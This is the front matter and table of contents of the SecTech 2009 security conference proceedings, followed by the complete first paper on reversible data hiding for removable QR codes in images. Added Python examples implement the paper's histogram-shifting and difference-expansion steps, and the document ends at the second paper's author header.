Communications in Computer and Information Science 58
Dominik Ślęzak, Tai-hoon Kim, Wai-Chi Fang, Kirk P. Arnett (Eds.)
Security Technology
International Conference, SecTech 2009
Held as Part of the Future Generation Information Technology Conference, FGIT 2009
Jeju Island, Korea, December 10-12, 2009
Proceedings
Volume Editors
Dominik Ślęzak, University of Warsaw & Infobright Inc., Poland, E-mail: [email protected]
Tai-hoon Kim, Hannam University, Daejeon, South Korea, E-mail: [email protected]
Wai-Chi Fang, National Chiao Tung University, Hsinchu, Taiwan, E-mail: [email protected]
Kirk P. Arnett, Mississippi State University, Mississippi State, MS, USA, E-mail: [email protected]
Library of Congress Control Number: 2009940048
CR Subject Classification (1998): E.3, C.2, D.2, D.4.6, K.6.5, C.2.3
ISSN 1865-0929
ISBN-10 3-642-10846-6 Springer Berlin Heidelberg New York
ISBN-13 978-3-642-10846-4 Springer Berlin Heidelberg New York
This work is subject to copyright. All rights are reserved, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, re-use of illustrations, recitation, broadcasting, reproduction on microfilms or in any other way, and storage in data banks. Duplication of this publication or parts thereof is permitted only under the provisions of the German Copyright Law of September 9, 1965, in its current version, and permission for use must always be obtained from Springer. Violations are liable to prosecution under the German Copyright Law. springer.com © Springer-Verlag Berlin Heidelberg 2009 Printed in Germany Typesetting: Camera-ready by author, data conversion by Scientific Publishing Services, Chennai, India Printed on acid-free paper SPIN: 12805136 06/3180 543210
Foreword
As future generation information technology (FGIT) becomes specialized and fragmented, it is easy to lose sight that many topics in FGIT have common threads and, because of this, advances in one discipline may be transmitted to others. Presentation of recent results obtained in different disciplines encourages this interchange for the advancement of FGIT as a whole. Of particular interest are hybrid solutions that combine ideas taken from multiple disciplines in order to achieve something more significant than the sum of the individual parts. Through such hybrid philosophy, a new principle can be discovered, which has the propensity to propagate throughout multifaceted disciplines.

FGIT 2009 was the first mega-conference that attempted to follow the above idea of hybridization in FGIT in a form of multiple events related to particular disciplines of IT, conducted by separate scientific committees, but coordinated in order to expose the most important contributions. It included the following international conferences: Advanced Software Engineering and Its Applications (ASEA), Bio-Science and Bio-Technology (BSBT), Control and Automation (CA), Database Theory and Application (DTA), Disaster Recovery and Business Continuity (DRBC; published independently), Future Generation Communication and Networking (FGCN) that was combined with Advanced Communication and Networking (ACN), Grid and Distributed Computing (GDC), Multimedia, Computer Graphics and Broadcasting (MulGraB), Security Technology (SecTech), Signal Processing, Image Processing and Pattern Recognition (SIP), and u- and e-Service, Science and Technology (UNESST).

We acknowledge the great effort of all the Chairs and the members of advisory boards and Program Committees of the above-listed events, who selected 28% of over 1,050 submissions, following a rigorous peer-review process.
Special thanks go to the following organizations supporting FGIT 2009: ECSIS, Korean Institute of Information Technology, Australian Computer Society, SERSC, Springer LNCS/CCIS, COEIA, ICC Jeju, ISEP/IPP, GECAD, PoDIT, Business Community Partnership, Brno University of Technology, KISA, K-NBTC and National Taipei University of Education. We are very grateful to the following speakers who accepted our invitation and helped to meet the objectives of FGIT 2009: Ruay-Shiung Chang (National Dong Hwa University, Taiwan), Jack Dongarra (University of Tennessee, USA), Xiaohua (Tony) Hu (Drexel University, USA), Irwin King (Chinese University of Hong Kong, Hong Kong), Carlos Ramos (Polytechnic of Porto, Portugal), Timothy K. Shih (Asia University, Taiwan), Peter M.A. Sloot (University of Amsterdam, The Netherlands), Kyu-Young Whang (KAIST, South Korea), and Stephen S. Yau (Arizona State University, USA).
We would also like to thank Rosslin John Robles, Maricel O. Balitanas, Farkhod Alisherov Alisherovish, and Feruza Sattarova Yusfovna, graduate students of Hannam University who helped in editing the FGIT 2009 material with great passion.
October 2009
Young-hoon Lee Tai-hoon Kim Wai-chi Fang Dominik Ślęzak
Preface
We would like to welcome you to the proceedings of the 2009 International Conference on Security Technology (SecTech 2009), which was organized as part of the 2009 International Mega-Conference on Future Generation Information Technology (FGIT 2009), held during December 10–12, 2009, at the International Convention Center Jeju, Jeju Island, South Korea.

SecTech 2009 focused on the various aspects of advances in security technology with computational sciences, mathematics and information technology. It provided a chance for academic and industry professionals to discuss recent progress in the related areas. We expect that the conference and its publications will be a trigger for further related research and technology improvements in this important subject.

We would like to acknowledge the great effort of all the Chairs and members of the Program Committee. Out of 140 submissions to SecTech 2009, we accepted 41 papers to be included in the proceedings and presented during the conference. This gives a roughly 30% acceptance ratio. Four of the papers accepted for SecTech 2009 were published in the special FGIT 2009 volume, LNCS 5899, by Springer. The remaining 37 accepted papers can be found in this CCIS volume.

We would like to express our gratitude to all of the authors of submitted papers and to all of the attendees, for their contributions and participation. We believe in the need for continuing this undertaking in the future. Once more, we would like to thank all the organizations and individuals who supported FGIT 2009 as a whole and, in particular, helped in the success of SecTech 2009.
October 2009
Dominik Ślęzak Tai-hoon Kim Wai-chi Fang Kirk P. Arnett
Organization
Organizing Committee

General Chair
Wai-chi Fang (National Chiao Tung University, Taiwan)

Program Chairs
Tai-hoon Kim (Hannam University, Korea)
Kirk P. Arnett (Mississippi State University, USA)

Advisory Board
Dominik Ślęzak (University of Warsaw and Infobright, Poland)
Edwin H-M. Sha (University of Texas at Dallas, USA)
Justin Zhan (CMU, USA)
Kouichi Sakurai (Kyushu University, Japan)
Laurence T. Yang (St. Francis Xavier University, Canada)
Byeong-Ho Kang (University of Tasmania, Australia)

Publicity Chairs
Antonio Coronato (ICAR-CNR, Italy)
Damien Sauveron (Université de Limoges / CNRS, France)
Hua Liu (Xerox Corporation, USA)
Kevin R.B. Butler (Pennsylvania State University, USA)
Guojun Wang (Central South University, China)
Tao Jiang (Huazhong University of Science and Technology, China)
Gang Wu (UESTC, China)
Yoshiaki Hori (Kyushu University, Japan)
Muhammad Khurram Khan (King Saud University, Saudi Arabia)

Publication Chair
Yong-ik Yoon (Sookmyung Women's University, Korea)

Program Committee
A. Hamou-Lhadj, ByungRae Cha, Costas Lambrinoudakis, Dieter Gollmann, E. Konstantinou, Eduardo B. Fernandez, Fangguo Zhang, Filip Orsag, Gerald Schaefer, Hiroaki Kikuchi, Hironori Washizaki, Hsiang-Cheh Huang, Hyun-Sung Kim, J.H. Abbawajy, Javier Garcia Villalba, Jongmoon Baik, Jordi Forne, Kouichi Sakurai, Larbi Esmahi, Jungsook Kim, Justin Zhan, Lejla Batina, Luigi Buglione, MalRey Lee, Mario Marques Freire, Martin Drahansky, Masahiro Mambo, N. Jaisankar, Nobukazu Yoshioka, Paolo D'Arco, Petr Hanacek, Qi Shi, Raphael C.-W. Phan, Rhee Kyung-Hyune, Robert Seacord, Rolf Oppliger, Rui Zhang, Serge Chaumette, Sheng-Wei Chen, Silvia Abrahao, Stan Kurkovsky, Stefan Katzenbeisser, Stefanos Gritzalis, Swee-Huay Heng, Tony Shan, Wen-Shenq Juang, Willy Susilo, Yannis Stamatiou, Yi Mu, Yijun Yu, Yingjiu Li, Yong Man Ro, Young Ik Eom
Table of Contents
Applications of Reversible Data Hiding Techniques with the Quick Response Codes. Hsiang-Cheh Huang, Feng-Cheng Chang, and Wai-Chi Fang. p. 1
A New Approach in T-FA Authentication with OTP Using Mobile Phone. Abdulaziz S. Almazyad and Yasir Ahmad. p. 9
Correlating Alerts into Compressed Graphs Using an Attribute-Based Method and Time Windows. Seyed Hossein Ahmadinejad and Saeed Jalili. p. 18
A Study on Secure Contents Using in Urban Computing. Hoon Ko, Jongmyung Choi, and Carlos Ramos. p. 26
Shadow Generation Protocol in Linguistic Threshold Schemes. Marek R. Ogiela and Urszula Ogiela. p. 35
Analysis of Handwritten Signature Image. Debnath Bhattacharyya, Poulami Das, Samir Kumar Bandyopadhyay, and Tai-hoon Kim. p. 43
The Design of Signature Selection for Protecting Illegal Outflow of Sensitive Information in Mobile Device. Bo-heung Chung, Min-ho Han, and Ki-young Kim. p. 51
Hardware Based Data Inspection for USB Data Leakage Prevention. DongHo Kang, BoHeung Jung, and KiYoung Kim. p. 57
Grayscale Image Classification Using Supervised Chromosome Clustering. Debnath Bhattacharyya, Poulami Das, Samir Kumar Bandyopadhyay, and Tai-hoon Kim. p. 64
Towards the Integration of Security Aspects into System Development Using Collaboration-Oriented Models. Linda Ariani Gunawan, Peter Herrmann, and Frank Alexander Kraemer. p. 72
Impact of Malicious Node on Broadcast Schemes. Aneel Rahim and Fahad bin Muyaha. p. 86
Hierarchical Identity-Based Identification Schemes. Ji-Jian Chin, Swee-Huay Heng, and Bok-Min Goi. p. 93
The Trend of the Security Research for the Insider Cyber Threat. Jaeseung Hong, Jongwung Kim, and Jeonghun Cho. p. 100
MIMO Wiretap Channel: A Scalar Approach. Mohammad Rakibul Islam and Jinsang Kim. p. 108
Security Testing for Operating System and Its System Calls. Gaoshou Zhai, Hanhui Niu, Na Yang, Minli Tian, Chengyu Liu, and Hengsheng Yang. p. 116
Efficient Group Signature with Forward Secure Revocation. Haimin Jin, Duncan S. Wong, and Yinlong Xu. p. 124
Detecting Distributed Denial of Service Attack Based on Multi-feature Fusion. Jieren Cheng, Jianping Yin, Yun Liu, Zhiping Cai, and Chengkun Wu. p. 132
Researching on Cryptographic Algorithm Recognition Based on Static Characteristic-Code. Tie-Ming Liu, Lie-hui Jiang, Hong-qi He, Ji-zhong Li, and Xian Yu. p. 140
Verification of Security-Relevant Behavior Model and Security Policy for Model-Carrying Code. Yonglong Wei, Xiaojuan Zheng, Jinglei Ren, Xudong Zheng, Chen Sun, and Zhenhao Li. p. 148
Feature Level Fusion of Biometrics Cues: Human Identification with Doddington's Caricature. Dakshina Ranjan Kisku, Phalguni Gupta, and Jamuna Kanta Sing. p. 157
A Study on the Interworking for SIP-Based Secure VoIP Communication with Security Protocols in the Heterogeneous Network. Seokung Yoon, Hyuncheol Jung, and Kyung-Seok Lee. p. 165
DDoS Attack Detection Using Three-State Partition Based on Flow Interaction. Jieren Cheng, Boyun Zhang, Jianping Yin, Yun Liu, and Zhiping Cai. p. 176
A Development of Finite State Machine Create Tool for Cryptography Module Validation. Jae-goo Jeong, Seung-yong Hur, and Gang-Soo Lee. p. 185
A Privacy-Aware System Using Threat-Based Evaluation and Feedback Method in Untrusted Ubiquitous Environments. Yuan Tian, Biao Song, and Eui-Nam Huh. p. 193
Fusion of Multiple Matchers Using SVM for Offline Signature Identification. Dakshina Ranjan Kisku, Phalguni Gupta, and Jamuna Kanta Sing. p. 201
A Two-Factor Mutual Authentication Scheme Using Biometrics and Smart Card. Sheikh Ziauddin. p. 209
Secure Collection Tree Protocol for Tamper-Resistant Wireless Sensors. Peter Pecho, Jan Nagy, Petr Hanáček, and Martin Drahanský. p. 217
Accelerometer Based Digital Video Stabilization for Security Surveillance Systems. Martin Drahanský, Filip Orság, and Petr Hanáček. p. 225
Escrowed Deniable Identification Schemes. Pairat Thorncharoensri, Qiong Huang, Willy Susilo, Man Ho Au, Yi Mu, and Duncan Wong. p. 234
Insights into Malware Detection and Prevention on Mobile Phones. Qiang Yan, Yingjiu Li, Tieyan Li, and Robert Deng. p. 242
Automation of Post-exploitation: Focused on MS-Windows Targets. Mohammad Tabatabai Irani and Edgar R. Weippl. p. 250
Speaker Dependent Frequency Cepstrum Coefficients. Filip Orság. p. 258
Towards the Detection of Encrypted BitTorrent Traffic through Deep Packet Inspection. David A. Carvalho, Manuela Pereira, and Mário M. Freire. p. 265
A Simple Encryption Scheme for Binary Elliptic Curves. Brian King. p. 273
Analysis of Text Complexity in a Crypto System – A Case Study on Telugu. M.S.V.S. Bhadri Raju, B. Vishnu Vardhan, G.A. Naidu, L. Pratap Reddy, and A. Vinaya Babu. p. 281
Symmetric-Key Encryption for Wireless Internet SCADA. Rosslin John Robles and Min-Kyu Choi. p. 289
An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection Based on Many-Core GPU. Chengkun Wu, Jianping Yin, Zhiping Cai, En Zhu, and Jieren Cheng. p. 298
Author Index. p. 307
Applications of Reversible Data Hiding Techniques with the Quick Response Codes
Hsiang-Cheh Huang (1), Feng-Cheng Chang (2), and Wai-Chi Fang (3)
(1) National University of Kaohsiung, Kaohsiung 811, Taiwan, [email protected]
(2) Tamkang University, I-Lan 262, Taiwan, [email protected]
(3) National Chiao-Tung University, Hsinchu 300, Taiwan, [email protected]
Abstract. Quick response (QR) codes aim at convenience-oriented applications for mobile phone users. People can use the mobile phone camera to capture the code, a seemingly random pattern usually displayed at the corner of a web page, and the hyperlink corresponding to the QR code is then accessed. Since a QR code looks like random noise, its presence can greatly reduce the value of the original image. With the aid of a reversible data hiding technique, we propose a scheme such that when the image containing the QR code is browsed, the hyperlink corresponding to the QR code is accessed first. Then the QR code can vanish and the original image can be recovered, retaining the information conveyed therein. Simulation results demonstrate the applicability of the proposed algorithm.

Keywords: Quick response (QR) code, reversible data hiding, histogram, difference expansion.
1 Introduction

The proliferation of Internet usage has made it easy for people to link to web pages from a PC, PDA, or mobile phone over wired or wireless networks. In particular, browsing web pages from mobile phones has brought much convenience to users' daily lives [1]. However, comparing the time needed to type a URL (Uniform Resource Locator) on a computer keyboard with that needed on a mobile phone keypad, the keypad makes linking to web pages considerably more inconvenient and difficult. The quick response (QR) code emerged to solve this problem. QR codes can easily be seen on web pages and posters nowadays. A QR code is a two-dimensional, square-shaped code, mostly represented in binary form (black and white pixels), attached somewhere in a web page or poster. Colorized QR codes also exist. Originally, the purpose of the QR code was to allow quick connection to a specific web page by converting the URL information into the QR code pattern. From the viewpoint of watermarking research [1], the QR code can be regarded as a visible watermark. Since a visible watermark causes degradation of image quality both objectively and subjectively, how to effectively remove the watermark while retaining the information conveyed in the original image is an interesting topic for applications. Here we propose an algorithm and the associated integration that utilizes the capability of the QR code and effectively recovers the original image after the QR code is removed. Once the image containing the QR code is browsed, the designated web page is accessed, and the original image is recovered by use of the reversible data hiding techniques described shortly.

This paper is organized as follows. In Sec. 2, we present some fundamental descriptions of QR codes. Then, in Sec. 3, we review two different kinds of reversible data hiding techniques and their integration with QR codes. Simulation results are demonstrated in Sec. 4, which suggest the applicability of the proposed algorithm and integration. Finally, we conclude this paper in Sec. 5.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 1–8, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Background Descriptions of QR Codes

The QR (quick response) code is a two-dimensional bar code created by the Japanese corporation Denso-Wave in 1994. It has also been standardized by the Japanese Industrial Standards (JIS) under the name JIS-X-0510: 1999 QR Code [2]. QR codes can easily be seen on web pages, or in advertisements in posters or newspapers. One example is depicted in Figure 1(a). This QR code contains the URL of the website of the original image in Figure 1(b), http://www.lenna.org/. After encoding, a square binary image of size 135 × 135 is produced. Figure 1(b) shows the practical scenario for the use of the QR code: it is inserted into the corner of the original image. We take the commonly used test image Lena, with image size 1024 × 1024, as an instance.

The main purpose of QR codes is to let mobile phone users link quickly to the web page corresponding to the QR code. Most mobile phones can read this code with the camera on the phone; the hyperlink information contained in the QR code is then deciphered and the web page is displayed on the screen of the mobile phone. Compared with conventional schemes for accessing a homepage from a mobile phone, users need not type the alphanumeric characters of the URL: by shooting the QR code with the mobile phone camera, the web page is shown instantly and much of the time spent typing alphanumeric characters is saved. However, the QR code remains in the original image, and hence degraded image quality is to be expected.

Unlike conventional bar codes, QR codes offer much larger capacities for carrying information, which can be classified as follows:
- Numeric only: at most 7089 characters;
- Alphanumeric: at most 4296 characters;
- Byte format: at most 2953 bytes;
- Japanese characters: at most 1817 characters.

Since the QR code is captured by mobile phone cameras, some errors might be induced, and hence the captured QR code needs some error correcting capability. The QR code can therefore correct 7% to 30% of the codewords, depending on the error correction level, by using Reed-Solomon codes [2].
[Figure 1: panels (a) and (b)]
Fig. 1. Test materials in this paper. (a) The QR code with size 135 × 135, containing the hyperlink of http://www.lenna.org/. (b) The grey level image "lena" with size 1024 × 1024, containing the QR code at the lower-right corner.
From the watermarking perspective, the QR code can be regarded as a visible watermark. For instance, at the lower-right portion of Figure 1(b), the pixels of the original image in this region are directly replaced by the QR code. After capturing the QR code, further procedures, such as shopping online or obtaining more information about the image itself, can be performed with the browser. Even though this brings convenience to the access of web pages, quality degradation of the original image can be expected, even though only $\frac{135 \times 135}{1024 \times 1024} \times 100\% = 1.74\%$ of the total image area is occupied. The peak signal-to-noise ratio (PSNR) is only 22.81 dB in Figure 1(b). In addition, it is sometimes inevitable that important information of the original image resides in the corner portions, and replacing the corner portions of the original image with the QR code might remove the inherent information conveyed there. Thus, we propose an algorithm that uses reversible data hiding to hide the corner portion of the original image into the rest of the original image in advance, and then replaces that portion by the QR code. After the image containing the QR code is browsed, the QR code is removed first, and the original data can be recovered with reversible data hiding from the rest of the image.
3 Algorithms of Reversible Data Hiding and Integration with QR Codes

Reversible data hiding is a new branch of data hiding research. At the encoder, the data are hidden into the original image, and the output looks identical to the original image. At the decoder, unlike conventional watermarking where only the watermark needs to be extracted, reversible data hiding requires that both the hidden data and the original image be perfectly recovered.
3.1 Histogram-Modification for Reversible Data Hiding
The histogram-modification scheme for data embedding is adopted from [3] and can be described as follows.

Step 1. Generate the histogram of the original image. The luminance value with the maximal number of occurrences in the histogram is labeled the "max point," while one with no occurrence is labeled the "zero point." The luminance values of the max and zero points, each represented by 8 bits, are treated as side information; hence a total of 16 bits must be transmitted to the receiver for data extraction.
Step 2. Select the range between the max and zero points. The range of luminance values between the max and zero points is recorded in the histogram.
Step 3. Modify the luminance values in the selected range. In the region between the max and zero points recorded in Step 2, the luminance values are altered in advance: all luminance values in the selected range are increased by 1.
Step 4. Embed the data. For embedding a binary watermark, if the watermark bit is '1,' the luminance value is increased by 1; if the watermark bit is '0,' it is decreased by 1.

To extract both the hidden data and the original image, the following steps apply.

Step 1. Locate the selected range with the side information. Luminance values between the max and zero points are compared.
Step 2. Extract the hidden data relating to the original. Every pixel in the output image is scanned and examined sequentially to extract the data bits, by comparison with Step 3 of the embedding procedure.
Step 3. Obtain the original image. By moving the histogram back into its original form, the original content is recovered.

Histogram-based reversible data hiding has the advantages of ease of implementation and little side information. On the other hand, the number of bits available for embedding, i.e., the capacity, might not be enough for the hidden data. Hence, the difference expansion (DE) scheme described in Sec. 3.2, based on the concept of the wavelet transform, was proposed.
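The embedding and extraction steps above, as an added example that is not the authors' code, on a constructed one-dimensional pixel list standing in for the raster-scanned image. It follows the cited histogram-shifting scheme [3], in which a '1' bit moves a peak pixel into the freed bin and a '0' bit leaves it in place, which is what keeps extraction unambiguous; the function names are assumptions.

```python
from collections import Counter


def find_max_and_zero_points(pixels):
    """Step 1 of embedding: the peak bin ('max point') and an empty bin
    ('zero point') of the 8-bit luminance histogram."""
    hist = Counter(pixels)
    max_point = max(range(256), key=lambda v: hist.get(v, 0))
    zeros = [v for v in range(256) if hist.get(v, 0) == 0]
    if not zeros:
        raise ValueError("no zero point: every luminance bin is occupied")
    # The empty bin nearest the peak keeps the shifted range, and so the
    # distortion of the marked image, as small as possible.
    zero_point = min(zeros, key=lambda v: abs(v - max_point))
    return max_point, zero_point


def _shift_params(max_point, zero_point):
    """Direction of the shift and the open range (max, zero) that is moved."""
    if zero_point > max_point:
        return 1, max_point + 1, zero_point - 1
    return -1, zero_point + 1, max_point - 1


def embed(pixels, bits):
    """Steps 2-4: shift the bins strictly between the peak and the empty bin
    by one towards the empty bin, then put one payload bit on each peak
    pixel.  Returns the marked pixels and the side information (max point,
    zero point, payload length); the two 8-bit values are the 16 bits of
    side information the paper mentions."""
    max_point, zero_point = find_max_and_zero_points(pixels)
    capacity = pixels.count(max_point)          # one bit per peak pixel
    if len(bits) > capacity:
        raise ValueError(f"payload of {len(bits)} bits exceeds capacity {capacity}")
    shift, lo, hi = _shift_params(max_point, zero_point)
    marked = [p + shift if lo <= p <= hi else p for p in pixels]
    it = iter(bits)
    for i, p in enumerate(marked):
        if p == max_point:
            b = next(it, None)
            if b is None:
                break                           # payload exhausted; leave the rest
            if b == 1:
                marked[i] = p + shift           # bit 1 moves the pixel into the freed bin
            # bit 0 leaves the peak pixel where it is
    return marked, (max_point, zero_point, len(bits))


def extract(marked, side_info):
    """Decoder: read the bits off the peak bin and the freed bin, then undo
    the shift so the original pixels come back exactly."""
    max_point, zero_point, n_bits = side_info
    shift, lo, hi = _shift_params(max_point, zero_point)
    s_lo, s_hi = lo + shift, hi + shift         # where the shifted pixels now sit
    bits, restored = [], []
    for p in marked:
        if len(bits) < n_bits and p == max_point + shift:
            bits.append(1)
            restored.append(max_point)
        elif len(bits) < n_bits and p == max_point:
            bits.append(0)
            restored.append(p)
        elif s_lo <= p <= s_hi:
            restored.append(p - shift)
        else:
            restored.append(p)
    return bits, restored


def demo():
    """Constructed 64-pixel 'image' with a peak at 120; returns whether the
    payload and the image both came back intact, plus the side information."""
    image = [120] * 40 + [118, 119, 121, 122, 123, 125, 130, 90] * 3
    payload = [1, 0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0]
    marked, side = embed(image, payload)
    bits, restored = extract(marked, side)
    return bits == payload and restored == image, side


if __name__ == "__main__":
    print(demo())    # (True, (120, 117, 12))
```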
3.2 Difference-Expansion for Reversible Data Hiding
If we group every 1 × 4 block into a unit, called the quad, reversible data hiding can be performed by using the relationships among the four pixels. The scheme, called difference expansion of quads (DEQ), is proposed in [4]. A quad is a 1 × 4 vector $(u_0, u_1, u_2, u_3)$ formed from four pixel values from a 2 × 2 block. Following DE, we then calculate the following values:
$$v_0 = \left\lfloor \frac{u_0 + u_1 + u_2 + u_3}{4} \right\rfloor, \quad (1)$$

$$v_1 = u_1 - u_0, \quad (2)$$

$$v_2 = u_2 - u_0, \quad (3)$$

$$v_3 = u_3 - u_0, \quad (4)$$

where $\lfloor \cdot \rfloor$ denotes the floor function. For embedding three bits $b_1, b_2, b_3$ into one quad,

$$\tilde{v}_1 = 2 \cdot \left\lfloor \frac{v_1}{2} \right\rfloor + b_1, \quad (5)$$

$$\tilde{v}_2 = 2 \cdot \left\lfloor \frac{v_2}{2} \right\rfloor + b_2, \quad (6)$$

$$\tilde{v}_3 = 2 \cdot \left\lfloor \frac{v_3}{2} \right\rfloor + b_3. \quad (7)$$
By doing so, the capacity of DEQ is 0.75 bit/pixel, meaning that at most three quarters of the image size, counted in bits, can be hidden. However, due to the overflow problems in Eqs. (2) to (4), some quad positions might not be suitable for embedding the three bits corresponding to that quad. The suitable positions for embedding, called the location map, are the side information generated. Since for natural images most quads are suitable for embedding three bits each, the positions that are not suitable for embedding, called the non-location map, are recorded instead, which reduces the size of the side information. From the derivations above, in comparison with Sec. 3.1, the DEQ scheme has the advantage of embedding a large amount of data, while the location map needs to be available at the decoder to perform the extraction of both the original image and the hidden data [5].

3.3 Proposed Scheme for Integration
Both the algorithms in Sec. 3.1 and Sec. 3.2 have their own drawbacks. Hence, we combine both algorithms by exploiting their respective advantages, and integrate them with the QR code.

Step 1. Generate the QR code with the information relating to the original image, and obtain the size of the QR code image.
Step 2. Produce the non-location map for data embedding in DEQ.
Step 3. Choose a threshold for embedding the beginning of the non-location map with the histogram-based scheme.
Step 4. If the sum of peak occurrences is larger than the threshold, hide the beginning of the non-location map into the histogram. If not, lower the threshold value in Step 2.
Step 5. Embed the remaining non-location map information with the DEQ method.
Step 6. Replace the lower-right corner by the QR code generated in Step 1.
Step 7. Output both the image with the QR code and the side information.

On the other hand, extraction of the data and the original image is simple and can be performed as follows.

Step 1. Locate the QR code area in the image and decipher the information contained in the QR code.
Step 2. Generate the histogram of the image, excluding the QR code portion.
Step 3. Reveal the selected range with the side information.
Step 4. Produce the beginning of the non-location map from the histogram.
Step 5. Extract the portion previously occupied by the QR code, and recover the original with the DEQ scheme.

By following the descriptions above, we can effectively hide the QR code image into the rest of the original image with high capacity and low overhead. After the removal of the QR code image, the original information contained in that area can be gathered back, and the original image can be obtained.
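The DEQ transform of Sec. 3.2 and its role in Steps 2 and 5 above, as an added example that is not the authors' code. It implements Eqs. (1)-(4) and their exact inverse; for the expansion it uses the expandable form 2·v_i + b_i from [4], which needs no stored LSBs and gives the three bits per quad (0.75 bit/pixel) stated in Sec. 3.2, and it derives the location map and non-location map from the overflow test. The quads are constructed and the function names are assumptions.

```python
def forward(u):
    """Eqs. (1)-(4): integer average v0 and three differences against u0."""
    u0, u1, u2, u3 = u
    v0 = (u0 + u1 + u2 + u3) // 4        # floor division, as in Eq. (1)
    return (v0, u1 - u0, u2 - u0, u3 - u0)


def inverse(v):
    """Exact inverse of forward(): u0 = v0 - floor((v1 + v2 + v3) / 4)."""
    v0, v1, v2, v3 = v
    u0 = v0 - (v1 + v2 + v3) // 4
    return (u0, v1 + u0, v2 + u0, v3 + u0)


def expand(v, bits):
    """Difference expansion: each difference is doubled and takes one bit."""
    v0, v1, v2, v3 = v
    b1, b2, b3 = bits
    return (v0, 2 * v1 + b1, 2 * v2 + b2, 2 * v3 + b3)


def is_expandable(u):
    """A quad may carry 3 bits only if every one of the 8 bit patterns keeps
    all four reconstructed pixels inside 0..255 (no overflow or underflow)."""
    v = forward(u)
    for pattern in range(8):
        bits = ((pattern >> 2) & 1, (pattern >> 1) & 1, pattern & 1)
        if any(not 0 <= p <= 255 for p in inverse(expand(v, bits))):
            return False
    return True


def capacity_bits(quads):
    return 3 * sum(is_expandable(q) for q in quads)


def embed(quads, payload):
    """Encoder: 3 payload bits per expandable quad.  Returns the marked quads
    and the side information: the location map (1 = quad carries data) and
    the payload length."""
    marked, location_map, pos = [], [], 0
    for u in quads:
        if pos < len(payload) and is_expandable(u):
            chunk = payload[pos:pos + 3]
            chunk = chunk + [0] * (3 - len(chunk))   # pad a short tail with zeros
            marked.append(inverse(expand(forward(u), chunk)))
            location_map.append(1)
            pos += 3
        else:
            marked.append(u)
            location_map.append(0)
    if pos < len(payload):
        raise ValueError(f"payload of {len(payload)} bits exceeds capacity "
                         f"{capacity_bits(quads)}")
    return marked, (location_map, len(payload))


def non_location_map(location_map):
    """Indices of quads carrying no data.  For a natural image this list is
    much shorter than the location map, which is why the paper records it."""
    return [i for i, flag in enumerate(location_map) if flag == 0]


def extract(marked, side_info):
    """Decoder: for flagged quads the LSB of each expanded difference is the
    payload bit, and halving the difference restores the original quad."""
    location_map, n_bits = side_info
    bits, restored = [], []
    for u, flag in zip(marked, location_map):
        if flag:
            v0, v1, v2, v3 = forward(u)
            bits.extend([v1 & 1, v2 & 1, v3 & 1])   # correct for negative v as well
            restored.append(inverse((v0, v1 >> 1, v2 >> 1, v3 >> 1)))
        else:
            restored.append(u)
    return bits[:n_bits], restored


def demo():
    """Constructed quads (each would come from a 2x2 block): the smooth ones
    are expandable, the near-white and near-black ones are not."""
    quads = [(100, 102, 101, 103), (254, 255, 253, 255),
             (50, 48, 52, 49), (0, 1, 0, 2)]
    payload = [1, 0, 1, 1, 1, 0]
    marked, side = embed(quads, payload)
    bits, restored = extract(marked, side)
    return bits == payload and restored == quads, side[0]


if __name__ == "__main__":
    print(demo())    # (True, [1, 0, 1, 0])
```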
4 Simulation Results

We perform the following items to assess the applicability of our algorithm.

At the encoder:
- generate the QR code;
- embed the QR code with the proposed algorithm;
- post the image containing the QR code on some web page.

At the decoder:
- access the image containing the QR code with the browser;
- decode the QR code information and remove the QR code;
- recover the original image.
Table 1 shows the experiments with four different test images and the corresponding URL information used to generate the QR codes. All the QR codes have size 135 × 135. The results for the third column, the baboon picture, are demonstrated in Figure 1. For all the pictures, 135 × 135 × 8 = 145800 bits at the lower-right portion of the original image must be hidden, and our algorithm is capable of hiding that amount of data. After inserting the QR code, the image qualities degrade to between 21.59 and 22.81 dB. At the decoder, after decoding the QR code, a new page pops up for the URL in the QR code, through which information relating to the original image can be provided or online shopping can proceed, as shown in Figure 2. Next, after removing the QR code, the original is recovered, and all the mean square errors (MSEs) in the final row of Table 1 are 0.00, meaning that the recovered images are identical to their original counterparts.

Table 1. Comparisons of image qualities
| Test image                                  | Lena                  | baboon                 | airplane                  | pepper                 |
| Image size                                  | 1024 × 1024           | 1024 × 1024            | 1024 × 1024               | 1024 × 1024            |
| Image quality with QR                       | 22.81 dB              | 21.71 dB               | 22.08 dB                  | 21.59 dB               |
| QR information                              | http://www.lenna.org  | http://www.nuk.edu.tw  | http://www.yahoo.com.tw   | http://www.google.com  |
| MSE between original and recovered images   | 0.00                  | 0.00                   | 0.00                      | 0.00                   |
Fig. 2. After decoding, both the web page corresponding to the QR code and the original image can be obtained
5 Conclusions

In this paper, we described the popularity of QR codes. QR codes facilitate access to web pages with mobile phones by capturing the specific corner of the image. As can be seen from practical scenarios, the presence of such a code degrades the quality of the original image or even conceals some information inherently contained in the original image. Taking advantage of the facilities offered by QR codes, users can access the web page with the QR code first; the code can then be removed from the corner of the image, and the original image recovered. The QR code information can be deciphered into some URL relating to the original image, and more information corresponding to the original image can be discovered by the users, such as online shopping. More applications can also be explored in the future.
Acknowledgments. The authors would like to thank National Science Council (Taiwan, R.O.C) for supporting this paper under Grant No. NSC97-2221-E-390-011 and NSC98-2221-E-390-017.
References
1. Pan, J.S., Huang, H.-C., Jain, L.C., Fang, W.C. (eds.): Intelligent Multimedia Data Hiding. Springer, Heidelberg (2007)
2. Denso Wave Incorporated: QR Code standardization (2003), http://www.denso-wave.com/qrcode/qrstandard-e.html
3. Ni, Z., Shi, Y.-Q., Ansari, N., Su, W.: Reversible Data Hiding. IEEE Trans. Circuits Syst. Video Technol. 16, 354–362 (2006)
4. Alattar, A.M.: Reversible Watermark Using the Difference Expansion of a Generalized Integer Transform. IEEE Trans. Image Process. 13, 1147–1156 (2004)
5. Hu, Y., Lee, H.K., Li, J.: DE-Based Reversible Data Hiding with Improved Overflow Location Map. IEEE Trans. Circuits Syst. Video Technol. 19, 250–260 (2009)
A New Approach in T-FA Authentication with OTP Using Mobile Phone

Abdulaziz S. Almazyad and Yasir Ahmad
Center of Excellence in Information Assurance, College of Computer Engineering and Sciences, King Saud University, KSA
[email protected], [email protected]
